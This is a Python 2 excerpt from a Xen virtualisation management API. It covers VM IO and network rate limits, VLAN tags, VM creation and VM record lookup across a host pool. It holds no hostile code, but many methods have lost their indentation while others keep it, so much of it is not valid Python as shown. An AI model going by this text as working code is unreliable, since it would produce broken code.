            if cmp(host_ref, XendNode.instance().uuid) == 0:
                return self._VM_set_IO_rate_limit(session, vm_ref, type, value, io_unit)
            else:
                remote_ip = BNPoolAPI.get_host_ip(host_ref)
                return xen_rpc_call(remote_ip, 'VM_set_IO_rate_limit', vm_ref, type, value, io_unit)
        else:
            return self._VM_set_IO_rate_limit(session, vm_ref, type, value, io_unit)
def _VM_set_IO_rate_limit(self, session, vm_ref, type, value, io_unit):
'''
@deprecated: not used
'''
#use /cgroup/blkio to constrol
try:
value = int(value)
if value >= 0:
if type not in ['write', 'read'] or io_unit not in ['MBps', 'iops']:
return xen_api_error(['INVALID_TYPE_OR_UNIT'])
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
tag = '%s_%s_rate' % (type, io_unit)
log.debug('Set vm(%s) %s: %s MBps' %(dominfo.getName(), tag, value))
dom_id = dominfo.getDomid()
dev2path_list = self._VM_get_dev2path_list(session, vm_ref)
pid2num_list = XendIOController.get_VM_pid2num(dom_id, dev2path_list)
XendIOController.set_VM_IO_rate_limit(pid2num_list, type, value, io_unit)
dominfo.info.setdefault('other_config',{})
dominfo.info['other_config'][tag] = value
self._VM_save(dominfo)
# log.debug("current dominfo:>>>>>>>>>>>>")
# log.debug(dominfo.info['other_config'])
return xen_api_success_void()
elif value == -1:
tag = '%s_%s_rate' % (type, io_unit)
log.debug('%s dont have limit value' % tag)
else:
log.exception('VM set IO rate limit: value invalid')
return xen_api_error(['Value invalid'])
except Exception, exn:
log.exception(exn)
return xen_api_error(exn)
    '''
    limit vm rate:
    flag = true: save the config and execute the cgroup command
    flag = false: only save the limit rate config
    '''
def _VM_set_IO_rate_limit_1(self, session, vm_ref, type, value, io_unit):
'''
@author: wuyuewen
@summary: Interal method. Set VM disk IO rate by cgroup, can set both read/write rate(MBps).
@param session: session of RPC.
@param vm_ref: uuid
@param type: read/write.
@param value: rate(MBps).
@param io_unit: MBps | iops
@param flag: True: excute cgroup cmd, False: just set value in VM's config file.
@return: True | False.
@rtype: dict.
'''
#use /cgroup/blkio to constrol
try:
value = int(value)
if value >= 0:
if type not in ['write', 'read'] or io_unit not in ['MBps', 'iops']:
return xen_api_error(['INVALID_TYPE_OR_UNIT'])
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
domname = dominfo.getName()
tag = '%s_%s_rate' % (type, io_unit)
log.debug('Set vm(%s) %s: %s MBps' %(domname, tag, value))
pid2num_list = self._VM_get_pid2devnum_list(session, vm_ref).get('Value')
XendIOController.set_VM_IO_rate_limit(pid2num_list, type, value, io_unit)
dominfo.info.setdefault('other_config',{})
dominfo.info['other_config'][tag] = value
self._VM_save(dominfo)
# log.debug("current dominfo:>>>>>>>>>>>>")
# log.debug(dominfo.info['other_config'])
return xen_api_success_void()
else:
log.exception('VM set IO rate limit: value invalid')
return xen_api_error(['Value invalid'])
except Exception, exn:
log.exception(exn)
return xen_api_error(exn)
def VM_get_IO_rate_limit(self, session, vm_ref, type, io_unit):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_IO_rate_limit(session, vm_ref, type, io_unit)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_IO_rate_limit', vm_ref, type, io_unit)
else:
return self._VM_get_IO_rate_limit(session, vm_ref, type, io_unit)
def _VM_get_IO_rate_limit(self, session, vm_ref, type, io_unit):
'''
@deprecated: not used
'''
rate = '-1'
tag = '%s_%s_rate' % (type, io_unit)
try:
other_config = self._VM_get_other_config(session, vm_ref).get('Value')
if other_config:
rate = other_config.get(tag,'-1')
return xen_api_success(rate)
except Exception, exn:
log.exception(exn)
return xen_api_success(rate)
def VM_clear_IO_rate_limit(self, session, vm_ref, type, io_unit):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_clear_IO_rate_limit(session, vm_ref, type, io_unit)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_clear_IO_rate_limit', vm_ref, type, io_unit)
else:
return self._VM_clear_IO_rate_limit(session, vm_ref, type, io_unit)
def _VM_clear_IO_rate_limit(self, session, vm_ref, type, io_unit):
'''
@deprecated: not used
'''
if type not in ['write', 'read'] or io_unit not in ['MBps', 'iops']:
return xen_api_error(['INVALID_TYPE_OR_UNIT'])
pid2num_list = self._VM_get_pid2devnum_list(session, vm_ref).get('Value')
#use /cgroup/blkio to constrol
XendIOController.clear_VM_IO_rate_limit(pid2num_list, type, io_unit)
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
domname = dominfo.getName()
tag = '%s_%s_rate' % (type, io_unit)
log.debug('clear vm(%s) %s' %(domname, tag))
if dominfo.info.get('other_config', {}) and tag in dominfo.info['other_config']:
del dominfo.info['other_config'][tag] #clear config
self._VM_save(dominfo)
return xen_api_success_void()
def _VM_clean_IO_limit_shutdown(self, session, vm_ref):
'''
@deprecated: not used
'''
log.debug('shutdown clean: pid2dev and rate limit in cgroup file')
pid2num_list = self._VM_get_pid2devnum_list(session, vm_ref).get('Value')
for type in ['read', 'write']:
for io_unit in ['MBps', 'iops']:
XendIOController.clear_VM_IO_rate_limit(pid2num_list, type, io_unit)
self._VM_clear_pid2devnum_list(session, vm_ref)
return xen_api_success_void()
def VM_set_rate(self, session, vm_ref, param_type, vif_ref, value):
'''
@author: wuyuewen
@summary: Set VIF's rate and burst limit controlled by OVS,
this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param param_type: rate/burst, rate is the rate(kbps) of VIF port controlled by OVS,
burst(kbps) is the volatility overhead rate.
@param vif_ref: VIF uuid
@param value: VIF's rate(kbps)
@return: True | False.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_rate(session, vm_ref, param_type, vif_ref, value)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_rate', vm_ref, param_type, vif_ref,value)
else:
return self._VM_set_rate(session, vm_ref, param_type, vif_ref, value)
    def _VM_set_rate(self, session, vm_ref, param_type, vif_ref, value):
        '''
        @author: wuyuewen
        @summary: Internal method. Set VIF's rate and burst limit controlled by OVS,
            this attribute stored in VM's other_config field.
        @param session: session of RPC.
        @param vm_ref: uuid
        @param param_type: rate/burst, rate is the rate(kbps) of VIF port controlled by OVS,
            burst(kbps) is the volatility overhead rate.
        @param vif_ref: VIF uuid
        @param value: VIF's rate(kbps)
        @return: True | False.
        @rtype: dict.
        '''
        xd = XendDomain.instance()
        dominfo = xd.get_vm_by_uuid(vm_ref)
        domname = dominfo.getName()
        log.debug('Set vm(%s) %s %s:%s' %(domname, str(vif_ref), param_type, value))
        device = self.VIF_get_device(session, vif_ref).get('Value')
        log.debug('vif_ref:%s VM_set_%s:%s rate:%s' % (vif_ref, param_type, device, value))
        # 'template' marks the case where no device name was available and the
        # eth number had to be derived from the VIF's position in the VM's VIF
        # list; in that case the live ovs command is skipped and only the
        # config value is persisted.
        template = False
        eth_num = ''
        if device != '' and device.startswith('eth'):
            # Device name like 'ethN' -> take N directly.
            eth_num = device[3:]
        elif not device :
            #log.debug('dom info %s' % dominfo.info)
            vif_refs = self._VM_get_VIFs(session, vm_ref).get('Value')
            #log.debug('vif refs: %s' % vif_refs)
            try:
                # Fall back to the VIF's index in the VM's VIF list.
                eth_num = str(vif_refs.index(vif_ref))
                template = True
                #log.debug('>>>>>>>eth_num" %s' % eth_num)
            except:
                # vif_ref not in the list (or list missing): leave eth_num empty.
                eth_num = ''
                pass
        if eth_num != '':
            log.debug('eth_num : %s ' % eth_num)
            try:
                if not template:
                    # Apply the limit on the live OVS port.
                    dominfo.set_rate(param_type, int(eth_num), value) # ovs_cmd
                #self._VM_get_other_config(session, vm_ref) # in oder to convert other_config
                # Persist under other_config[param_type][eth_num].
                dominfo.info.setdefault('other_config',{})
                tag_list = dominfo.info['other_config'].setdefault(param_type,{})
                dominfo.info['other_config'][param_type][eth_num] = value
                #log.debug('other_config: %s' % value)
                return self._VM_save(dominfo)
            except Exception,exn:
                log.debug(exn)
                return xen_api_error(['device name invalid', device])
        # No usable eth number: nothing to do, report success.
        return xen_api_success_void()
def _VM_set_rate_by_ethnum(self, session, vm_ref, param_type, eth_num, value):
'''
@author: wuyuewen
@summary: Internal method. Set VIF's rate and burst limit controlled by OVS,
this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param param_type: rate/burst, rate is the rate(kbps) of VIF port controlled by OVS,
burst(kbps) is the volatility overhead rate.
@param eth_num: eth_num of VIF
@param value: VIF's rate(kbps)
@return: True | False.
@rtype: dict.
'''
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
domname = dominfo.getName()
log.debug('VM_set_%s:%s rate:%s' % ( param_type, eth_num, value))
dominfo.set_rate(param_type, int(eth_num), value) # ovs_cmd
#self._VM_get_other_config(session, vm_ref) # in oder to convert other_config
dominfo.info.setdefault('other_config',{})
tag_list = dominfo.info['other_config'].setdefault(param_type,{})
dominfo.info['other_config'][param_type][eth_num] = value
return self._VM_save(dominfo)
#add by wufan
def VM_set_all_tag(self, session, vm_ref, tag_list=None):
'''
@author: wuyuewen
@summary: Set all VIF's tag(VLAN-ID), this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param tag_list: dict of tag for each VIF, the structure is {eth_num, tag_num} , e.g. {0:1, 1:2}
@return: True | False
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_all_tag(session, vm_ref, tag_list)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_all_tag', vm_ref, tag_list)
else:
return self._VM_set_all_tag(session, vm_ref, tag_list)
#add by wufan
def _VM_set_all_tag(self, session, vm_ref, tag_list=None):
'''
@author: wuyuewen
@summary: Internal method. Set all VIF's tag(VLAN-ID), this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param tag_list: dict of tag for each VIF, the structure is {eth_num, tag_num} , e.g. {0:1, 1:2}
@return: True | False
@rtype: dict.
'''
log.debug('set vm all tag')
if tag_list is None:
# xd = XendDomain.instance()
# dominfo = xd.get_vm_by_uuid(vm_ref)
# log.debug('dom info %s' % dominfo.info)
vif_refs = self._VM_get_VIFs(session, vm_ref).get('Value')
for vif_ref in vif_refs:
tag = self._VM_get_tag(session, vm_ref, vif_ref).get('Value')
#log.debug('tag:%s' % str(tag))
self._VM_set_tag( session, vm_ref, vif_ref, tag)
self._VM_update_tag(session, vm_ref, vif_refs)
else:
#tag_list is a dict
#log.debug('tag_list:%s' % tag_list)
for eth_num, tag in tag_list.items():
self._VM_set_tag_by_ethnum(session, vm_ref, eth_num, tag)
return xen_api_success_void()
def VM_set_tag(self, session, vm_ref, vif_ref, value, ovs=None):
'''
@author: wuyuewen
@summary: Set VIF's tag(VLAN-ID), this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param vif_ref: VIF uuid
@param value: VIF's tag number(VLAN-ID), default number is -1(VLAN not used).
@return: True | False
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_tag(session, vm_ref, vif_ref, value, ovs)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_tag', vm_ref, vif_ref, value, ovs)
else:
return self._VM_set_tag(session, vm_ref, vif_ref, value, ovs)
#original by wuyuewen
#def _VM_set_tag(self, session, vm_ref, value):
# xd = XendDomain.instance()
# dominfo = xd.get_vm_by_uuid(vm_ref)
# domname = dominfo.getName()
# tag = self._VM_get_tag(session, vm_ref).get('Value')
# if tag:
# log.debug('Set vm(%s) vlan: %s' % (domname, value))
# dominfo.set_tag(value)
# return self._VM_add_to_other_config(session, vm_ref, "tag", value)
#add by wufan
    def _VM_set_tag(self, session, vm_ref, vif_ref, value, ovs):
        '''
        @author: wuyuewen
        @summary: Internal method. Set VIF's tag(VLAN-ID), this attribute stored in VM's other_config field.
            If *ovs* names a bridge different from the VIF's current one, the
            VIF is also moved to that bridge (with rollback on failure).
        @param session: session of RPC.
        @param vm_ref: uuid
        @param vif_ref: VIF uuid
        @param value: VIF's tag number(VLAN-ID), default number is -1(VLAN not used).
        @param ovs: target OVS bridge name, or None/empty to keep the current bridge.
        @return: True | False
        @rtype: dict.
        '''
        xennode = XendNode.instance()
        xenapi = self._get_XendAPI_instance()
        xd = XendDomain.instance()
        dominfo = xd.get_vm_by_uuid(vm_ref)
        domname = dominfo.getName()
        if not xd.is_valid_dev("vif", vif_ref):
            return xen_api_error(['VIF_NOT_EXISTS'])
        device = self.VIF_get_device(session, vif_ref).get('Value')
        bridge = xd.get_dev_property_by_uuid('vif', vif_ref, 'bridge')
#        network_org = xd.get_dev_property_by_uuid('vif', vif_ref, 'network')
        log.debug('Set vm(%s) %s vlan: %s ovs: %s bridge: %s' %(domname, str(vif_ref), value, ovs, bridge))
#        log.debug('vif_ref:%s VM_set_tag:%s vlanid:%s' % (vif_ref, device, value))
        # Resolve the eth number: from the 'ethN' device name if present,
        # otherwise from the VIF's position in the VM's VIF list.
        eth_num = -1
        if device and device.startswith('eth'):
            eth_num = device[3:]
        else:
            vifs = self._VM_get_VIFs(session, vm_ref).get('Value')
            if vif_ref in vifs:
                eth_num = vifs.index(vif_ref)
        if ovs and cmp(ovs, bridge) != 0:
            # Bridge change requested: validate the target network first.
            xennode._init_networks()
            is_valid_network = xennode.is_valid_network(ovs)
            if not is_valid_network:
                return xen_api_error(['OVS_NOT_EXISTS'])
            network_new = None
            list_network_new = xenapi.network_get_by_name_label(session, ovs).get('Value')
            if list_network_new:
                network_new = list_network_new[0]
            # Move the port to the new bridge and set the tag in one step.
            dominfo.switch_vif_to_different_ovs_and_set_tag(int(eth_num), value, ovs, bridge)
            try:
#                rc = self._VIF_set(vif_ref, 'network', network_new, network_org)
                rc1 = self._VIF_set(vif_ref, 'bridge', ovs, bridge)
                if not rc1:
                    # Persisting the bridge change failed: switch back.
                    dominfo.switch_vif_to_different_ovs_and_set_tag(int(eth_num), value, bridge, ovs)
                    return xen_api_error(['VIF_SET_BRIDGE_ERROR'])
            except Exception, e:
                # Roll back the live switch before propagating the error.
                dominfo.switch_vif_to_different_ovs_and_set_tag(int(eth_num), value, bridge, ovs)
                raise e
        else:
            # Same bridge: only the VLAN tag changes.
            dominfo.set_tag(int(eth_num), value) # ovs_cmd
        #self._VM_get_other_config(session, vm_ref) # in oder to convert other_config
        dominfo.info.setdefault('other_config',{})
        dominfo.info['other_config'].setdefault('tag',{})
        dominfo.info['other_config']['tag'][eth_num] = value
        self._VM_save(dominfo)
        return xen_api_success_void()
def _VM_set_tag_by_ethnum(self, session, vm_ref, eth_num, value):
'''
@author: wuyuewen
@summary: Internal method. Set VIF's tag(VLAN-ID) by eth_num, this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param eth_num: eth_num of VIF
@param value: VIF's tag number(VLAN-ID), default number is -1(VLAN not used).
@return: True | False
@rtype: dict.
'''
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
domname = dominfo.getName()
log.debug('Set vm(%s) %s vlan:%s' %(domname, str(eth_num), value))
dominfo.set_tag(int(eth_num), value) # ovs_cmd
#self._VM_get_other_config(session, vm_ref) # in oder to convert other_config
dominfo.info.setdefault('other_config',{})
tag_list = dominfo.info['other_config'].setdefault('tag',{})
dominfo.info['other_config']['tag'][eth_num] = value
return self._VM_save(dominfo)
def VM_remove_from_other_config(self, session, vm_ref, key):
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_remove_from_other_config(session, vm_ref, key)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_remove_from_other_config', vm_ref, key)
else:
return self._VM_remove_from_other_config(session, vm_ref, key)
def _VM_remove_from_other_config(self, session, vm_ref, key):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
if dom and 'other_config' in dom.info \
and key in dom.info['other_config']:
del dom.info['other_config'][key]
return self._VM_save(dom)
else:
return xen_api_success_void()
    def VM_get_crash_dumps(self, _, vm_ref):
        '''
        @deprecated: not used
        @summary: Crash dump retrieval is not implemented; always returns the
            TODO response.
        '''
        return xen_api_todo()
def verify(self, ip):
'''
@deprecated: not used
'''
try:
proxy = ServerProxy("http://" + ip + ":9363/")
response = proxy.session.login('root')
except socket.error:
return False
else:
if cmp(response['Status'], 'Failure') == 0:
return False
return True
def VM_get_suspend_VDI(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_suspend_VDI(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_suspend_VDI', vm_ref)
else:
return self._VM_get_suspend_VDI(session, vm_ref)
def _VM_get_suspend_VDI(self, session, vm_ref):
'''
@deprecated: not used
'''
xennode = XendNode.instance()
return xen_api_success(xennode.get_suspend_VDI(vm_ref))
def VM_get_suspend_SR(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_suspend_SR(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_suspend_SR', vm_ref)
else:
return self._VM_get_suspend_SR(session, vm_ref)
def _VM_get_suspend_SR(self, session, vm_ref):
'''
@deprecated: not used
'''
xennode = XendNode.instance()
return xen_api_success(xennode.get_suspend_SR(vm_ref))
# class methods
def VM_get_all_and_consoles(self, session):
'''
@deprecated: not used
'''
VM_and_consoles = {}
for d in XendDomain.instance().list('all'):
vm_uuid = d.get_uuid()
if cmp(vm_uuid, DOM0_UUID) == 0:
continue
dom = XendDomain.instance().get_vm_by_uuid(vm_uuid)
vm_consoles = []
for console in dom.get_consoles():
vm_consoles.append(console)
VM_and_consoles[vm_uuid] = vm_consoles
return xen_api_success(VM_and_consoles)
# def VM_get_all(self, session):
# refs = self._VM_get_all()
# if BNPoolAPI._isMaster:
# host_ref = XendNode.instance().uuid
# for key in BNPoolAPI.get_hosts():
# if cmp(key, host_ref) != 0:
# ip = BNPoolAPI.get_host_ip(key)
# refs += xen_rpc_call(ip, "VM_get_all")
#
# return xen_api_success(refs)
def VM_get_all(self, session):
'''
@author: wuyuewen
@summary: Get all guest VMs.
@param session: session of RPC.
@return: list of VMs uuid.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
refs = []
refs.extend(self._VM_get_all(session).get('Value'))
for k in BNPoolAPI.get_hosts():
if cmp(k, XendNode.instance().uuid) == 0:
continue
remote_ip = BNPoolAPI.get_host_ip(k)
# log.debug(remote_ip)
refs.extend(xen_rpc_call(remote_ip, 'VM_get_all').get('Value'))
return xen_api_success(refs)
else:
return self._VM_get_all(session)
def _VM_get_all(self, session):
'''
@author: wuyuewen
@summary: Internal method. Get all guest VMs.
@param session: session of RPC.
@return: list of VMs uuid.
@rtype: dict.
'''
refs = [d.get_uuid() for d in XendDomain.instance().list('all')
if d.get_uuid() != DOM0_UUID]
if refs:
return xen_api_success(refs)
else:
return xen_api_success([])
def VM_get_by_name_label(self, session, label):
'''
@author: wuyuewen
@summary: Get VM by VM's name label.
@param session: session of RPC.
@param label: name label of VM
@return: VM.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
refs = []
refs.extend(self._VM_get_by_name_label(session, label)['Value'])
for k in BNPoolAPI.get_hosts():
if cmp(k, XendNode.instance().uuid) == 0:
continue
remote_ip = BNPoolAPI.get_host_ip(k)
refs.extend(xen_rpc_call(remote_ip, 'VM_get_by_name_label', label)['Value'])
return xen_api_success(refs)
else:
return self._VM_get_by_name_label(session, label)
def _VM_get_by_name_label(self, session, label):
'''
@author: wuyuewen
@summary: Internal method. Get VM by VM's name label.
@param session: session of RPC.
@param label: name label of VM
@return: VM.
@rtype: dict.
'''
xendom = XendDomain.instance()
uuids = []
dom = xendom.domain_lookup_by_name_label(label)
if dom:
return xen_api_success([dom.get_uuid()])
return xen_api_success([])
def VM_get_security_label(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
label = dom.get_security_label()
return xen_api_success(label)
    def VM_set_security_label(self, session, vm_ref, sec_label, old_label):
        '''
        @deprecated: not used
        @summary: Replace the VM's security label, compare-and-swap style:
            *old_label* must match the current label.
        @return: the new ssidref on success, or a SECURITY_ERROR.
        '''
        dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
        (rc, errors, oldlabel, new_ssidref) = \
            dom.set_security_label(sec_label, old_label)
        if rc != xsconstants.XSERR_SUCCESS:
            return xen_api_error(['SECURITY_ERROR', rc,
                                  xsconstants.xserr2string(-rc)])
        # On success (rc == 0) report the new ssidref instead of the rc.
        if rc == 0:
            rc = new_ssidref
        return xen_api_success(rc)
    def VM_create_on(self, session, vm_struct, host_ref):
        '''
        @author: wuyuewen
        @summary: A Pool range method, create a VM on a Host in Pool.
        @precondition: vm_struct is legal, vm name not duplicated.
        @param session: session of RPC.
        @param vm_struct: dict of vm structure
        @param host_ref: VM create on which Host.
        @return: VM.
        @rtype: dict.
        @raise xen_api_error: VM name already exists
        @raise XendError:
        '''
        if BNPoolAPI._isMaster:
            log.debug(vm_struct)
            # Reject a caller-supplied uuid that already exists in the pool.
            newuuid = vm_struct.get('uuid', None)
            check_uuid = self._VM_create_check_vm_uuid_unique(newuuid)
            if not check_uuid:
                return xen_api_error(XEND_API_ERROR_VM_UNIQUE_UUID_ERROR)
            # Name labels must be unique pool-wide.
            vm_label = vm_struct.get('nameLabel')
            vms = self.VM_get_by_name_label(session, vm_label)
            if vms.get('Value'):
                return xen_api_error(['VM name already exists', 'VM', vm_label])
            else:
                if cmp(host_ref, XendNode.instance().uuid) == 0:
                    # Target host is this master: create locally.
                    response = self._VM_create(session, vm_struct)
                    domuuid = response.get('Value')
                else:
                    # Target host is remote: forward the whole call.
                    remote_ip = BNPoolAPI.get_host_ip(host_ref)
                    response = xen_rpc_call(remote_ip, 'VM_create_on', vm_struct, host_ref)
                    domuuid = response.get('Value')
                if domuuid:
                    # Record the new VM -> host mapping in the pool structs.
                    BNPoolAPI.update_data_struct('vm_create', domuuid, host_ref)
                return response
        else:
            # Slave: create locally and register against the local host.
            response = self._VM_create(session, vm_struct)
            domuuid = response.get('Value')
            if domuuid:
                BNPoolAPI.update_data_struct('vm_create', domuuid, XendNode.instance().uuid)
            return response
def VM_create(self, session, vm_struct):
'''
@author: wuyuewen
@summary: A Host range method, create a VM on this Host.
@precondition: vm_struct is legal, vm name not duplicated.
@param session: session of RPC.
@param vm_struct: dict of vm structure
@return: VM.
@rtype: dict.
@raise xen_api_error: VM name already exists
@raise XendError:
'''
if BNPoolAPI._isMaster:
newuuid = vm_struct.get('uuid', None)
check_uuid = self._VM_create_check_vm_uuid_unique(newuuid)
if not check_uuid:
return xen_api_error(XEND_API_ERROR_VM_UNIQUE_UUID_ERROR)
vm_label = vm_struct.get('nameLabel')
vms = self.VM_get_by_name_label(session, vm_label)
if vms.get('Value'):
return xen_api_error(['VM name already exists', 'VM', vm_label])
else:
response = self._VM_create(session, vm_struct)
domuuid = response.get('Value')
if domuuid:
BNPoolAPI.update_data_struct('vm_create', domuuid, XendNode.instance().uuid)
return response
else:
response = self._VM_create(session, vm_struct)
domuuid = response.get('Value')
log.debug("new vm local uuid : %s", domuuid)
if domuuid:
BNPoolAPI.update_data_struct('vm_create', domuuid, XendNode.instance().uuid)
return response
def _VM_create(self, session, vm_struct):
'''
@author: wuyuewen
@summary: Internal method. Create a VM on this Host.
@precondition: vm_struct is legal, vm name not duplicated.
@param session: session of RPC.
@param vm_struct: dict of vm structure
@return: VM.
@rtype: dict.
@raise xen_api_error: VM name already exists
@raise XendError:
'''
xendom = XendDomain.instance()
domuuid = XendTask.log_progress(0, 100,
xendom.create_domain, vm_struct)
return xen_api_success(domuuid)
def _VM_create_check_vm_uuid_unique(self, newuuid):
if newuuid:
return BNPoolAPI.check_vm_uuid_unique(newuuid)
else:
return True
def VM_create_from_vmstruct(self, session, vm_struct):
'''
@deprecated: not used
'''
xendom = XendDomain.instance()
domuuid = XendTask.log_progress(0, 100,
xendom.create_domain, vm_struct)
return xen_api_success(domuuid)
    def VM_create_from_sxp(self, session, path, start_it=False, update_pool_structs=True):
        '''
        @author: wuyuewen
        @summary: Create a VM on this Host from .sxp file.
        @precondition: sxp file is legal, vm name not duplicated.
        @param session: session of RPC.
        @param path: path of sxp file
        @param start_it: Start the VM after create, if start_it=True, Host must have enough free memory.
        @param update_pool_structs: register the new VM in the pool data structs.
        @return: VM.
        @rtype: dict.
        @raise xen_api_error: VM name already exists
        @raise XendError:
        '''
#        filename = '/home/share/config.sxp'
        try:
            # sxp.parse returns a list of top-level s-expressions; the domain
            # config is the first one.
            sxp_obj = sxp.parse(open(path, 'r'))
            sxp_obj = sxp_obj[0]
            xendom = XendDomain.instance()
            domuuid = XendTask.log_progress(0, 100,
                                            xendom.domain_new, sxp_obj)
            if update_pool_structs:
                BNPoolAPI.update_data_struct('vm_create', domuuid, XendNode.instance().uuid)
            if start_it:
#                try:
                response = self._VM_start(session, domuuid, False, True)
                # If the start fails, undo the creation so no half-created
                # domain is left behind.
                if cmp(response['Status'], 'Failure') == 0:
                    self._VM_destroy(session, domuuid, False)
                    return response
#                except Exception, exn:
#                    self._VM_destroy(session, domuuid, False)
#                    return xen_api_error(['VM_START_FAILED', 'VM', domuuid])
                return response
            else:
                return xen_api_success(domuuid)
        except IOError, e:
            return xen_api_error(["Unable to read file: %s" % path])
        except Exception, exn:
            log.exception(exn)
            return xen_api_error(['Create from sxp failed!'])
# finally:
# cmd = 'rm -f %s' % path
# doexec(cmd)
# return XendTask.log_progress(0, 100, do_vm_func,
# "domain_start", domuuid, False, False)
# object methods
def VM_get_record(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's record.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: VM record
@rtype: dict.
@raise xen_api_error: VM not exists
'''
#log.debug('=================vm_get_record:%s' % vm_ref)
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_record(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_record', vm_ref)
else:
return self._VM_get_record(session, vm_ref)
    def _VM_get_record(self, session, vm_ref):
        '''
        @author: wuyuewen
        @summary: Internal method. Get VM's record.
        @param session: session of RPC.
        @param vm_ref: VM's uuid
        @return: VM record
        @rtype: dict.
        @raise xen_api_error: VM not exists
        '''
        xendom = XendDomain.instance()
        xeninfo = xendom.get_vm_by_uuid(vm_ref)
        xennode = XendNode.instance()
        if not xeninfo:
            log.debug("can not find vm:" + vm_ref)
            return xen_api_error(['HANDLE_INVALID', 'VM', vm_ref])
        domid = xeninfo.getDomid()
        dom_uuid = xeninfo.get_uuid()
        # Assemble the full record from the domain info plus node-level
        # storage lookups (suspend VDI/SR, connected disk/iso SRs).
        record = {
            'uuid': dom_uuid,
            'power_state': xeninfo.get_power_state(),
            'name_label': xeninfo.getName(),
            'name_description': xeninfo.getNameDescription(),
            'user_version': 1,
            'is_a_template': xeninfo.info['is_a_template'],
            'is_local_vm' : self._VM_get_is_local_vm(session, vm_ref).get("Value", True),
            'ip_addr' : xeninfo.getDomainIp(),
            'MAC' : xeninfo.getDomainMAC(),
            'auto_power_on': xeninfo.info['auto_power_on'],
            'resident_on': XendNode.instance().uuid,
            'memory_static_min': xeninfo.get_memory_static_min(),
            'memory_static_max': xeninfo.get_memory_static_max(),
            'memory_dynamic_min': xeninfo.get_memory_dynamic_min(),
            'memory_dynamic_max': xeninfo.get_memory_dynamic_max(),
            'VCPUs_params': xeninfo.get_vcpus_params(),
            'VCPUs_at_startup': xeninfo.getVCpuCount(),
            'VCPUs_max': xeninfo.getVCpuCount(),
            'actions_after_shutdown': xeninfo.get_on_shutdown(),
            'actions_after_reboot': xeninfo.get_on_reboot(),
            'actions_after_suspend': xeninfo.get_on_suspend(),
            'actions_after_crash': xeninfo.get_on_crash(),
            'consoles': xeninfo.get_consoles(),
            'VIFs': xeninfo.get_vifs(),
            'VBDs': xeninfo.get_vbds(),
            'VTPMs': xeninfo.get_vtpms(),
            'DPCIs': xeninfo.get_dpcis(),
            'DSCSIs': xeninfo.get_dscsis(),
            'DSCSI_HBAs': xeninfo.get_dscsi_HBAs(),
            'PV_bootloader': xeninfo.info.get('PV_bootloader'),
            'PV_kernel': xeninfo.info.get('PV_kernel'),
            'PV_ramdisk': xeninfo.info.get('PV_ramdisk'),
            'PV_args': xeninfo.info.get('PV_args'),
